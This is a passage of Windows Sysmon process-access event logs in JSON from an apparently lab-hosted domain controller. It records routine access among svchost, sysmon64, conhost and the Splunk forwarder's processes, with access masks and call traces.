06:52:59.175","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:53:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4325,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:59.175\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:52:59.175","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:53:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4326,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:59.175\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:52:59.175","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:53:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4327,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:59.175\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:52:59.175","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:53:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4328,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:59.175\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:52:59.175","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:53:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4329,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:59.175\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:52:59.175","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:53:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4330,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:59.175\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:52:59.175","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:53:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4331,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:59.175\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-0010F6780500}\r\nSourceProcessId: 3336\r\nSourceThreadId: 1980\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-114B-5F25-0000-00100B150600}\r\nTargetProcessId: 4856\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:52:59.175","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-0010F6780500}","SourceProcessId":"3336","SourceThreadId":"1980","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-114B-5F25-0000-00100B150600}","TargetProcessId":"4856","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:53:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4332,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:59.300\r\nSourceProcessGUID: {E2A3D6B1-114B-5F25-0000-00100B150600}\r\nSourceProcessId: 4856\r\nSourceThreadId: 4876\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nTargetProcessGUID: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nTargetProcessId: 1828\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+6b453|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+8e8530|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:52:59.300","SourceProcessGUID":"{E2A3D6B1-114B-5F25-0000-00100B150600}","SourceProcessId":"4856","SourceThreadId":"4876","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","TargetProcessGUID":"{E2A3D6B1-1103-5F25-0000-00101A740500}","TargetProcessId":"1828","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+6b453|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+8e8530|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:53:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
